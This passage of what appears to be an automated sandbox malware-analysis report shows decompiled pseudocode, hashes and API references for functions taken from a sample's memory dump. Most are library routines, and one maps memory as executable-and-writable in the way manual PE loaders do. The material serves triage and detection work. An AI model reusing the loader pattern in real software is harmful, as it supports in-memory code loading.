Opcode ID: 6b3f41145ba10282da9524f857f7220c946a5c811a27f0511ac89d3e5221f757
Instruction ID: 9eef87f5dddfb232ccbd38563ddddc74f46284e77eca31a45ee7ede10904436d
Opcode Fuzzy Hash: 6b3f41145ba10282da9524f857f7220c946a5c811a27f0511ac89d3e5221f757
Instruction Fuzzy Hash: 351125B0900B049FD3309F6B8181917FBF8BF94714B108A2FE59686A51D7B9F444CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7F8 Relevance: 3.0, APIs: 2, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040B7F8(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr _a4) {
				signed int _v8;
				long _v20;
				char _v316;
				signed int _v320;
				void* __esi;
				signed int _t13;
				intOrPtr* _t15;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t30;
				void* _t32;
				signed int _t33;

				_t30 = __edi;
				_t23 = __ebx;
				_t13 =  *0x444664; // 0xfa3a0753
				_v8 = _t13 ^ _t33;
				_t15 =  *0x44729c; // 0x5b10c0
				_v320 = _v320 & 0x00000000;
				if(_t15 != 0) {
					__eflags =  *_t15 - 1;
					if(__eflags == 0) {
						 *0x447670 = E004084B5( &_v320,  &_v316,  *((intOrPtr*)(_t15 + 4)), __eflags, __ecx);
					} else {
						 *0x447670 = 0x80000;
					}
				} else {
					 *0x447670 = 0x10000;
				}
				_t18 = RtlAllocateHeap(GetProcessHeap(), 0, _v20); // executed
				_t32 = _t18;
				_t19 =  *0x44729c; // 0x5b10c0
				if(_a4 == 0) {
					_push(3);
					_push(_v20);
					_push(_t32);
				} else {
					_push(2);
					_push(0);
					_push(_t30);
				}
				E004089B3(_t19); // executed
				return E0041F69E(_t32, _t23, _v8 ^ _t33, _v20, _t30, _t32, _v320);
			}

0x0040b7f8
0x0040b7f8
0x0040b801
0x0040b808
0x0040b80b
0x0040b810
0x0040b81a
0x0040b828
0x0040b82b
0x0040b84e
0x0040b82d
0x0040b82d
0x0040b82d
0x0040b81c
0x0040b81c
0x0040b81c
0x0040b85f
0x0040b869
0x0040b86b
0x0040b870
0x0040b879
0x0040b87b
0x0040b87e
0x0040b872
0x0040b872
0x0040b874
0x0040b876
0x0040b876
0x0040b885
0x0040b89e

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 0040B858
RtlAllocateHeap.NTDLL(00000000), ref: 0040B85F

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 953b3ee457345edeb3e52e8c646eb3b32e8c7b465543e7c6b8a88132d592a7c5
Instruction ID: 7402214ca7c228fef407772c61c7da215cc8eec3c73f19e5d7918d0f5d876f66
Opcode Fuzzy Hash: 953b3ee457345edeb3e52e8c646eb3b32e8c7b465543e7c6b8a88132d592a7c5
Instruction Fuzzy Hash: DA115E75904214EBCB11EF65ED05BAA77B4FB02344F1080B9E4057A2A0DB749A46CFDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041DDDA Relevance: 3.0, APIs: 2, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041DDDA(intOrPtr __esi, CHAR* _a4) {
				void* __ebx;
				void* _t11;
				void* _t20;
				void* _t21;

				 *((intOrPtr*)(__esi + 0x7c)) = 0;
				 *((intOrPtr*)(__esi + 0x84)) = 0;
				 *((char*)(__esi + 0x80)) = 0;
				 *((intOrPtr*)(__esi + 0x78)) = 0;
				 *((intOrPtr*)(__esi + 0x70)) = 0;
				 *((intOrPtr*)(__esi + 0x90)) = 0;
				 *((intOrPtr*)(__esi + 0x74)) = 0;
				if(_a4 != 0) {
					_t11 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t21 = _t11;
					if(_t21 != 0xffffffff) {
						_t20 = E0041DE59(__esi, _t21, 0);
						if(_t20 == 0) {
							 *((char*)(__esi + 0x80)) = 1;
							return 0;
						}
						CloseHandle(_t21);
						return _t20;
					}
					return 0x200;
				}
				return 0x10000;
			}

0x0041dde2
0x0041dde5
0x0041ddeb
0x0041ddf1
0x0041ddf4
0x0041ddf7
0x0041ddfd
0x0041de03
0x0041de1b
0x0041de21
0x0041de26
0x0041de38
0x0041de3c
0x0041de49
0x00000000
0x0041de50
0x0041de3f
0x00000000
0x0041de45
0x00000000
0x0041de28
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,0041E423,?,?), ref: 0041DE1B

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8112eba38f2619a6e79649a99708294329a34afd4ff263b8c097f6f9cc33ddb0
Instruction ID: 6093f1bcadd5358327b7d74c75f12d9dfdb9c0a169b941190b0d47fd2c458d9b
Opcode Fuzzy Hash: 8112eba38f2619a6e79649a99708294329a34afd4ff263b8c097f6f9cc33ddb0
Instruction Fuzzy Hash: C301D4B5A04B00AFE3114F3A9CC0BA3BBD8FB24755F10413FF66586250C7B4AC81D618

Uniqueness

Uniqueness Score: -1.00%

Function 00417E1F Relevance: 3.0, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00417E1F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ecx;
				void* _t43;
				signed int _t51;
				void* _t52;
				intOrPtr* _t53;

				_t42 = __ebx;
				_push(0x9c);
				E00423610(E00433CB9, __ebx, __edi, __esi);
				_t1 = _t52 - 0x10;
				 *_t1 =  *(_t52 - 0x10) & 0x00000000;
				_t55 =  *_t1;
				 *((intOrPtr*)(_t52 - 0xa8)) = 0x4400e8;
				 *(_t52 - 4) = 1;
				 *(_t52 - 0x10) = 2;
				 *((intOrPtr*)(_t52 - 0x58)) = 0x440080;
				E00416323(_t52 - 0x58,  *_t1, _t52 - 0xa4);
				_t51 = 3;
				 *(_t52 - 4) = _t51;
				_t11 =  *((intOrPtr*)(_t52 - 0xa8)) + 4; // 0x50
				 *((intOrPtr*)(_t52 +  *_t11 - 0xa8)) = 0x4400d4;
				_push(2);
				_push(_t52 - 0xa4);
				E00418FB2(__ebx, _t51,  *_t1);
				_push(_t43);
				 *(_t52 - 4) = 4;
				 *_t53 =  *((intOrPtr*)(_t52 + 0xc));
				_push(_t52 - 0xa8); // executed
				E0041853B(__ebx, _t43, __edi, _t51,  *_t1); // executed
				E00418E2D(_t52 - 0xa8,  *((intOrPtr*)(_t52 + 8)));
				 *(_t52 - 0x10) = _t51;
				 *(_t52 - 4) = 0;
				E00418DEE(_t42, _t52 - 0x58, _t51, _t55);
				 *((intOrPtr*)(_t52 - 0x58)) = 0x43fd48;
				E0041EDCC(_t52 - 0x58);
				return E004236AF( *((intOrPtr*)(_t52 + 8)));
			}

0x00417e1f
0x00417e1f
0x00417e29
0x00417e2e
0x00417e2e
0x00417e2e
0x00417e32
0x00417e42
0x00417e4d
0x00417e54
0x00417e5b
0x00417e62
0x00417e63
0x00417e6c
0x00417e6f
0x00417e7a
0x00417e82
0x00417e83
0x00417e8b
0x00417e8c
0x00417e93
0x00417e9c
0x00417e9d
0x00417eab
0x00417eb3
0x00417eb6
0x00417eba
0x00417ec3
0x00417eca
0x00417ed8

APIs

__EH_prolog3.LIBCMT ref: 00417E29

Part of subcall function 00416323: std::locale::_Init.LIBCPMT ref: 00416362
Part of subcall function 00416323: std::locale::facet::_Incref.LIBCPMT ref: 00416370

Part of subcall function 00418FB2: __EH_prolog3.LIBCMT ref: 00418FB9

Part of subcall function 0041853B: __EH_prolog3_catch.LIBCMT ref: 00418542

Part of subcall function 00418DEE: __EH_prolog3.LIBCMT ref: 00418DF5

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00417ECA

Part of subcall function 0041EDCC: std::ios_base::_Tidy.LIBCPMT ref: 0041EDED

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3$std::ios_base::_$H_prolog3_catchIncrefInitIos_base_dtorTidystd::locale::_std::locale::facet::_
String ID:
API String ID: 223534676-0
Opcode ID: f099f5959aa01231bf225cd68c9ad8ac55553b132de7786460a240842e85a7e6
Instruction ID: f678b9eeaa65545dde54efe60cc7b08961b7e81f8460ee926fab4a69861896bd
Opcode Fuzzy Hash: f099f5959aa01231bf225cd68c9ad8ac55553b132de7786460a240842e85a7e6
Instruction Fuzzy Hash: C611DD75A00218EEDF50DF95D945BCDBBB4BF04308F10848AE548AB241CBB89788CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A338 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A338(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				char _v8;
				void* _t13;
				void* _t18;
				void* _t23;
				void* _t24;

				_t19 = __edi;
				_t16 = __ebx;
				_t21 = ":";
				_t13 = E00421D3B(__ebx, _t18, __edi, _a4, ":",  &_v8);
				_t24 = _t23 + 0xc;
				while(_t13 != 0) {
					E00409DF4(_t18, _a12, 0x43d12c, _a8, _t13, _a16, _a20, _a24, _a28, _a32, 0, _a36, 0); // executed
					_t13 = E00421D3B(_t16, _t18, _t19, 0, _t21,  &_v8);
					_t24 = _t24 + 0x3c;
				}
				return _t13;
			}

0x0040a338
0x0040a338
0x0040a342
0x0040a34b
0x0040a350
0x0040a38b
0x0040a377
0x0040a383
0x0040a388
0x0040a388
0x0040a391

APIs

_strtok_s.LIBCMT ref: 0040A34B
_strtok_s.LIBCMT ref: 0040A383

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strtok_s
String ID:
API String ID: 3897208846-0
Opcode ID: e818ecb33265d6e4ad0e5fdebc4d6b84e023afcfb6ad8b3589c85cab1de32e7e
Instruction ID: 60292e817976f65071331862e7bc98d59175ebd3f4abacc893eaf0b48ecd6085
Opcode Fuzzy Hash: e818ecb33265d6e4ad0e5fdebc4d6b84e023afcfb6ad8b3589c85cab1de32e7e
Instruction Fuzzy Hash: 17F0D072500219BBDF116E91DC02FDB7F6EEF19354F144125FE08640A1E27AEA21AB95

Uniqueness

Uniqueness Score: -1.00%

Function 004181BE Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004181BE(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				signed int _v8;
				char _v1008;
				signed int _t7;
				void* _t12;
				char* _t13;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t15 = __ebx;
				_t7 =  *0x444664; // 0xfa3a0753
				_v8 = _t7 ^ _t21;
				E0041F6B0( &_v1008, 0, 0x3e8);
				_t12 =  *0x4474c0(0, _a4, 0, 0,  &_v1008); // executed
				if(_t12 < 0) {
					_t13 = 0;
				} else {
					_t13 =  &_v1008;
				}
				return E0041F69E(_t13, _t15, _v8 ^ _t21, _t18, _t19, _t20);
			}

0x004181be
0x004181be
0x004181be
0x004181c7
0x004181ce
0x004181df
0x004181f7
0x004181ff
0x00418209
0x00418201
0x00418201
0x00418201
0x00418216

APIs

_memset.LIBCMT ref: 004181DF
SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: FolderPath_memset
String ID:
API String ID: 3318179493-0
Opcode ID: efbe2e99aa2b947d5ac1443a06522482261517b8f68039e6e7c4fc01e601c188
Instruction ID: ab1861d6e9e7971fcaa5c1e01a4ff64b3c50001cbadfde4247d5fce6480c05f1
Opcode Fuzzy Hash: efbe2e99aa2b947d5ac1443a06522482261517b8f68039e6e7c4fc01e601c188
Instruction Fuzzy Hash: 07F03031B10208ABDB51DF60DC86F9D77FCAB04704F5041B9AA09E60D0EA74EB4A8A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00404E31 Relevance: 3.0, APIs: 2, Instructions: 25
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 58%

			E00404E31(void* __edi, void* __esi, signed int _a4) {
				char _v16;
				void* _t10;
				void* _t15;
				void* _t18;

				_t10 = 0;
				if(_a4 > 0) {
					_t24 = _a4 - 0xffffffff;
					if(_a4 > 0xffffffff) {
						L3:
						_a4 = _a4 & 0x00000000;
						E0041FD77( &_v16,  &_a4);
						_v16 = 0x43525c;
						return E004231B6( &_v16, 0x441640);
					}
					_t10 = E00420467(_t15, _t18, __edi, __esi, _t24, _a4); // executed
					if(0 == 0) {
						goto L3;
					}
				}
				return _t10;
			}

0x00404e34
0x00404e3c
0x00404e3e
0x00404e42
0x00404e51
0x00404e51
0x00404e5c
0x00404e6a
0x00000000
0x00404e71
0x00404e47
0x00404e4f
0x00000000
0x00000000
0x00404e4f
0x00404e77

APIs

std::exception::exception.LIBCMT ref: 00404E5C
__CxxThrowException@8.LIBCMT ref: 00404E71

Part of subcall function 00420467: _malloc.LIBCMT ref: 00420481

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 4063778783-0
Opcode ID: 7aa6675e28032938d2ee216bcd1e0006a24e4c6ea095fcb3be437057e652b3e6
Instruction ID: 6c91ab74637bbe141a59c175cf39115c6eabdf37e22a0f02cf74c2d64ee0b34a
Opcode Fuzzy Hash: 7aa6675e28032938d2ee216bcd1e0006a24e4c6ea095fcb3be437057e652b3e6
Instruction Fuzzy Hash: FAE06571900609AACF10EE71D841ADE77B8AB103ADF50C27BE924A51C1E738C6888A99

Uniqueness

Uniqueness Score: -1.00%

Function 004043FB Relevance: 2.6, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E004043FB(void* __ecx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _t22;
				void* _t25;
				void* _t29;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				long _t36;
				intOrPtr* _t41;
				intOrPtr _t42;
				signed int _t46;
				void* _t47;

				_t47 = __esi;
				_t22 =  *((intOrPtr*)(__esi + 0x138));
				_t35 = 0;
				_v8 = 0;
				if(0 >=  *(__esi + 0x46)) {
					L8:
					_t36 = _t35 - _v8;
					_t25 = VirtualAlloc( *((intOrPtr*)(_t47 + 0x74)) + _v8, _t36, 0x3000, 0x40); // executed
					 *(_t47 + 0x148) = _t25;
					 *((intOrPtr*)(_t47 + 0x144)) =  *((intOrPtr*)(_t47 + 0x74));
					if(_t25 != 0) {
						L12:
						asm("sbb eax, eax");
						_t29 = ( ~( *(_t47 + 0x148)) & 0xfffffffd) + 3;
						L13:
						return _t29;
					}
					if(( *(_t47 + 0x56) & 0x00000001) == 0) {
						_t30 = VirtualAlloc(0, _t36, 0x3000, 0x40);
						 *(_t47 + 0x148) = _t30;
						 *((intOrPtr*)(_t47 + 0x144)) = _t30 - _v8;
						goto L12;
					}
					_t29 = 4;
					goto L13;
				}
				_t46 =  *(__esi + 0x46) & 0x0000ffff;
				_t41 = _t22 + 0xc;
				do {
					_t42 =  *((intOrPtr*)(_t41 - 4));
					if(_t42 != 0) {
						_t32 =  *_t41;
						if(_t32 < _v8) {
							_v8 = _t32;
						}
						_t33 = _t32 + _t42;
						if(_t33 > _t35) {
							_t35 = _t33;
						}
					}
					_t41 = _t41 + 0x28;
					_t46 = _t46 - 1;
				} while (_t46 != 0);
				goto L8;
			}

0x004043fb
0x004043ff
0x00404406
0x0040440b
0x00404412
0x0040443a
0x0040443d
0x0040444d
0x00404456
0x0040445c
0x00404464
0x0040448c
0x00404494
0x00404499
0x0040449c
0x0040449f
0x0040449f
0x0040446a
0x00404477
0x0040447d
0x00404486
0x00000000
0x00404486
0x0040446e
0x00000000
0x0040446e
0x00404414
0x00404418
0x0040441b
0x0040441b
0x00404420
0x00404422
0x00404427
0x00404429
0x00404429
0x0040442c
0x00404430
0x00404432
0x00404432
0x00404430
0x00404434
0x00404437
0x00404437
0x00000000

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0040444D
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00404477

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 325dc0ca67f9d2873535f33221895a637bb24f53a58a12ddb96f201bf1991add
Instruction ID: 32eda97dd1f28b46728cb4fd08d45b157e63d46df7724862fbac645eeffab35f
Opcode Fuzzy Hash: 325dc0ca67f9d2873535f33221895a637bb24f53a58a12ddb96f201bf1991add
Instruction Fuzzy Hash: B211B4B5600705ABC720CFB4C9C4B9BBBF4EB80714F14443EE64AD7390D278A941C618

Uniqueness

Uniqueness Score: -1.00%

Function 004194E8 Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E004194E8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed long long _a24) {
				signed int _v8;
				long _v124;
				intOrPtr _v128;
				char _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				signed int _v148;
				char _v149;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t58;
				signed char _t61;
				int _t65;
				intOrPtr _t70;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t88;
				signed int _t89;
				signed int _t91;
				intOrPtr _t94;
				intOrPtr _t98;
				intOrPtr _t105;
				intOrPtr _t109;
				signed long long _t112;

				_t91 = (_t89 & 0xfffffff8) - 0x94;
				_t55 =  *0x444664; // 0xfa3a0753
				_v8 = _t55 ^ _t91;
				_t82 = _a16;
				_t75 =  *((intOrPtr*)(_t82 + 0x18));
				_v136 = _a4;
				_t58 =  *((intOrPtr*)(_t82 + 0x1c));
				_t94 = _t58;
				if(_t94 <= 0 && (_t94 < 0 || _t75 == 0) && ( *(_t82 + 0x14) & 0x00002000) == 0) {
					_t75 = 6;
					_t58 = 0;
				}
				_t72 = _t75;
				_v128 = _t58;
				_t98 = _t58;
				if(_t98 < 0) {
					L9:
					_v140 = _t72;
					goto L10;
				} else {
					_t70 = 0x24;
					if(_t98 > 0 || _t72 > _t70) {
						_v140 = _t70;
						L10:
						_t112 = _a24;
						_t76 =  *(_t82 + 0x14);
						asm("cdq");
						_t73 = _t72 - _v140;
						asm("sbb [esp+0x24], edx");
						_v144 = _v144 & 0x00000000;
						_v148 = _v148 & 0x00000000;
						_t61 = _t76 & 0x00003000;
						if(_t61 != 0x2000) {
							L31:
							_push(_a12);
							_push(_a8);
							_push(_t76);
							_push(_t76);
							 *_t91 = _t112;
							_push(_v140);
							_t65 = swprintf( &_v124, 0x6c, E0041995D(0, _t76,  &_v132)); // executed
							_push(_t65);
							_push(_t73);
							_push(_v148);
							_push(_v144);
							_push( &_v124);
							_push(_a20);
							_push(_v136);
							E004199B9(_t73, _t82, 0x1388, _t82,  &_v132, _t110);
							_pop(_t83);
							_pop(_t87);
							_pop(_t74);
							return E0041F69E(_v136, _t74, _v8 ^ _t91 + 0x3c, 0x1388, _t83, _t87);
						}
						_t112 = st1;
						asm("fucompp");
						asm("fnstsw ax");
						if((_t61 & 0x00000044) != 0) {
							goto L31;
						}
						asm("fldz");
						asm("fcom st0, st1");
						asm("fnstsw ax");
						if((_t61 & 0x00000041) != 0) {
							_v149 = 0;
							asm("fxch st0, st1");
						} else {
							asm("fxch st0, st1");
							_v149 = 1;
							asm("fchs");
						}
						asm("fcom st0, st1");
						_t88 = 0xa;
						asm("fnstsw ax");
						_t112 =  *0x440170;
						if((_t61 & 0x00000041) != 0) {
							while(1) {
								__eflags = _v144 - 0x1388;
								if(_v144 >= 0x1388) {
									goto L16;
								}
								_t112 = _t112 / st0;
								_v144 = _v144 + _t88;
								asm("fxch st0, st1");
								asm("fcom st0, st2");
								asm("fnstsw ax");
								__eflags = _t61 & 0x00000041;
								if((_t61 & 0x00000041) != 0) {
									asm("fxch st0, st1");
									continue;
								}
								st0 = _t112;
								goto L21;
							}
							goto L16;
						} else {
							L16:
							st1 = _t112;
							L21:
							asm("fxch st0, st2");
							asm("fcomp st0, st1");
							asm("fnstsw ax");
							if((_t61 & 0x00000005) != 0) {
								L29:
								_t110 = _v149;
								st1 = _t112;
								if(_v149 != 0) {
									asm("fchs");
								}
								goto L31;
							}
							_t105 = _v128;
							if(_t105 < 0) {
								goto L29;
							}
							if(_t105 > 0) {
								while(1) {
									L25:
									_t112 =  *0x440168;
									asm("fcomp st0, st1");
									asm("fnstsw ax");
									if((_t61 & 0x00000001) != 0 || _v148 >= 0x1388) {
										goto L29;
									}
									_t73 = _t73 + 0xfffffff6;
									_t112 = _t112 * st1;
									asm("adc dword [esp+0x24], 0xffffffff");
									_v148 = _v148 + _t88;
									_t109 = _v128;
									if(_t109 > 0) {
										continue;
									}
									if(_t109 >= 0) {
										goto L24;
									}
									goto L29;
								}
								goto L29;
							}
							L24:
							if(_t73 < _t88) {
								goto L29;
							}
							goto L25;
						}
					} else {
						goto L9;
					}
				}
			}

0x004194ee
0x004194f4
0x004194fb
0x00419508
0x0041950b
0x0041950e
0x00419512
0x0041951a
0x0041951c
0x0041952b
0x0041952c
0x0041952c
0x0041952e
0x00419530
0x00419534
0x00419536
0x00419547
0x00419547
0x00000000
0x00419538
0x0041953a
0x0041953b
0x00419541
0x0041954b
0x0041954f
0x00419552
0x00419555
0x00419556
0x00419558
0x0041955c
0x00419561
0x00419568
0x0041956f
0x00419634
0x00419634
0x00419639
0x00419640
0x00419641
0x00419642
0x00419645
0x00419656
0x0041965e
0x0041965f
0x00419660
0x00419668
0x0041966e
0x0041966f
0x00419672
0x00419676
0x00419689
0x0041968a
0x0041968b
0x00419696
0x00419696
0x0041957d
0x0041957f
0x00419581
0x00419586
0x00000000
0x00000000
0x0041958c
0x0041958e
0x00419590
0x00419595
0x004195a2
0x004195a7
0x00419597
0x00419597
0x00419599
0x0041959e
0x0041959e
0x004195b1
0x004195b8
0x004195b9
0x004195bb
0x004195c4
0x004195cc
0x004195cc
0x004195d0
0x00000000
0x00000000
0x004195d2
0x004195d4
0x004195d8
0x004195da
0x004195dc
0x004195de
0x004195e1
0x004195ca
0x00000000
0x004195ca
0x004195e3
0x00000000
0x004195e3
0x00000000
0x004195c6
0x004195c6
0x004195c6
0x004195e5
0x004195e5
0x004195e7
0x004195e9
0x004195ee
0x00419629
0x00419629
0x0041962e
0x00419630
0x00419632
0x00419632
0x00000000
0x00419630
0x004195f0
0x004195f5
0x00000000
0x00000000
0x004195f7
0x004195fd
0x004195fd
0x004195fd
0x00419603
0x00419605
0x0041960a
0x00000000
0x00000000
0x00419612
0x00419615
0x00419617
0x0041961c
0x00419620
0x00419625
0x00000000
0x00000000
0x00419627
0x00000000
0x00000000
0x00000000
0x00419627
0x00000000
0x004195fd
0x004195f9
0x004195fb
0x00000000
0x00000000
0x00000000
0x004195fb
0x00000000
0x00000000
0x00000000
0x0041953b

APIs

swprintf.LIBCMT ref: 00419656

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: swprintf
String ID:
API String ID: 233258989-0
Opcode ID: 950d00d0955c792f9b1827d8b96ecd374e29668e6dc3db0e306a240aba589bce
Instruction ID: 6534eb12d34b0506364cd905f8be455dd6b13e29f5b8b7fe06f086b6729526fe
Opcode Fuzzy Hash: 950d00d0955c792f9b1827d8b96ecd374e29668e6dc3db0e306a240aba589bce
Instruction Fuzzy Hash: 89513873A04302BBDB129F10C9517DB7BE5FB84754F100E1EF884A22A1E3398D958BDA

Uniqueness

Uniqueness Score: -1.00%

Function 0041853B Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041853B(void* __ebx, void* __ecx, void* __edi, intOrPtr* __esi, void* __eflags) {
				void* _t58;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t64;
				void* _t66;
				intOrPtr* _t69;
				void* _t72;
				long long* _t73;
				void* _t74;

				_t74 = __eflags;
				_t70 = __esi;
				_push(0x24);
				E00423643(E00433573, __ebx, __edi, __esi);
				_t69 =  *((intOrPtr*)(_t72 + 8));
				_push(_t72 - 0x28);
				 *((intOrPtr*)(_t72 - 0x18)) = 0;
				E004190D0(0, _t69, __esi, _t74);
				 *(_t72 - 4) = 0;
				_t75 =  *((intOrPtr*)(_t72 - 0x24));
				if( *((intOrPtr*)(_t72 - 0x24)) != 0) {
					 *(_t72 - 4) = 1;
					_t70 = E0041A2B7(0, _t66, _t69, _t72 - 0x1c, _t75);
					E0040F2EA(_t72 - 0x1c);
					 *(_t72 - 4) = 2;
					_t61 =  *_t69;
					_t62 =  *((intOrPtr*)(_t61 + 4));
					 *((char*)(_t72 - 0x30)) = 0;
					 *((char*)(_t72 - 0x20)) =  *((intOrPtr*)(_t62 + _t69 + 0x40));
					_t64 =  *_t70;
					 *_t73 =  *((intOrPtr*)(_t72 + 0xc));
					 *((intOrPtr*)( *_t70 + 0xc))(_t72 - 0x30,  *((intOrPtr*)(_t72 - 0x30)),  *((intOrPtr*)(_t62 + _t69 + 0x38)),  *((intOrPtr*)(_t61 + 4)) + _t69,  *((intOrPtr*)(_t72 - 0x20)), _t64, _t64, E0040F564( *((intOrPtr*)( *_t69 + 4)) + _t69, _t72 - 0x1c));
					if( *((intOrPtr*)(_t72 - 0x30)) != 0) {
						 *((intOrPtr*)(_t72 - 0x18)) = 4;
					}
					 *(_t72 - 4) = 0;
				}
				_t58 =  *((intOrPtr*)( *_t69 + 4)) + _t69;
				if( *((intOrPtr*)(_t72 - 0x18)) != 0) {
					E0041546D(_t58,  *((intOrPtr*)(_t72 - 0x18)), 0);
				}
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				_push(_t72 - 0x28);
				E0041912C(0, _t69, _t70,  *(_t72 - 4));
				return E004236AF(_t69);
			}

0x0041853b
0x0041853b
0x0041853b
0x00418542
0x00418547
0x0041854f
0x00418550
0x00418553
0x00418558
0x0041855b
0x0041855e
0x00418574
0x00418581
0x00418583
0x0041858b
0x0041858f
0x00418594
0x0041859b
0x004185a2
0x004185a5
0x004185a9
0x004185be
0x004185c4
0x004185c6
0x004185c6
0x004185cd
0x004185cd
0x00418611
0x00418616
0x0041861c
0x0041861c
0x00418621
0x00418628
0x00418629
0x00418635

APIs

__EH_prolog3_catch.LIBCMT ref: 00418542

Part of subcall function 004190D0: __EH_prolog3.LIBCMT ref: 004190D7

Part of subcall function 0040F564: std::locale::facet::_Incref.LIBCPMT ref: 0040F56B

Part of subcall function 0041A2B7: __EH_prolog3.LIBCMT ref: 0041A2BE
Part of subcall function 0041A2B7: std::_Lockit::_Lockit.LIBCPMT ref: 0041A2C8

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

